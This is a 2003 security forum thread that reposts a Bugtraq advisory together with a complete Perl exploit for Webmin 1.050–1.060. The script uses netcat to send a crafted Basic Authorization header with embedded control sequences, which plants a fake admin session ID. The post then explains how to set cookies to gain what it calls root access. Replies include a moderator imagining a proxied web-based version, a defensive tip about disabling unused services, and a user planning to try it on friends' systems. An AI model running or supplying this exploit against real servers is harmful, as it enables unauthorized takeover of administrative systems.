• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

Webmin 1.050 - 1.060 remote exploit - Dangerous

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Mon Feb 24, 2003 6:19 pm    Post subject: Webmin 1.050 - 1.060 remote exploit - Dangerous Reply with quote

From Bugtraq today.

Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) to be enabled.

Webmin can verify user authentication by use of a session ID (SID) that is
assigned when a user successfully authenticates to Webmin. It is possible to
inject a fake SID into the session ID database by using a malicious username
containing control sequences used internally by Webmin.

This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it
is a simple case of creating a cookie in your favorite browser containing:

sid=1234567890; testing=1

Such that the Cookie HTTP header contains:

Cookie: sid=1234567890; testing=1

When the webmin server recieves this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.

Cheers,
Carl

webmin-exploit.pl

Code:
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
   print "Syntax:\n\t$0 hostname\n";
   exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
   print "netcat not found!\n";
   exit(2);
}

open(NC, "|$nc $hostname 10000 >& //[b][/b]dev[b][/b]/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
Back to top
View user's profile Send private message Visit poster's website
dan
Just Arrived
Just Arrived


Joined: 24 Feb 2003
Posts: 0


Offline

PostPosted: Tue Feb 25, 2003 12:53 pm    Post subject: Reply with quote

Nice one, is there source or is it yours?
Back to top
View user's profile Send private message
ThePsyko
SF Mod
SF Mod


Joined: 17 Oct 2002
Posts: 16777178
Location: California

Offline

PostPosted: Wed Feb 26, 2003 4:44 am    Post subject: Reply with quote

Damn, I can't believe what a geek I've become... I took one look at that source and thought how simple it would be to port that to PHP, dump the netcat (make it independent), add the ability to pipe it through an anonymous HTTP proxy and slap a web interface on it...

I think I need a life lol
Back to top
View user's profile Send private message Send e-mail
flw
Forum Fanatic
Forum Fanatic


Joined: 27 May 2002
Posts: 16777215
Location: U.S.A.

Offline

PostPosted: Wed Feb 26, 2003 5:18 am    Post subject: Reply with quote

Since this would really only be a threat from a inside source wouldn't a old rule of thumb resolve this? Kill all unused services. Then when needed restart the service and when done kill it. Problem solved? or am I missing something?


This is what I do with sshd due to outside access.
Back to top
View user's profile Send private message Visit poster's website
chipmunktised
Just Arrived
Just Arrived


Joined: 14 Feb 2003
Posts: 0


Offline

PostPosted: Fri Feb 28, 2003 4:25 pm    Post subject: Reply with quote

Nice. I'll test it out on a trusted zone from friends of mine. Pretty nice deal Very Happy
Back to top
View user's profile Send private message AIM Address
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register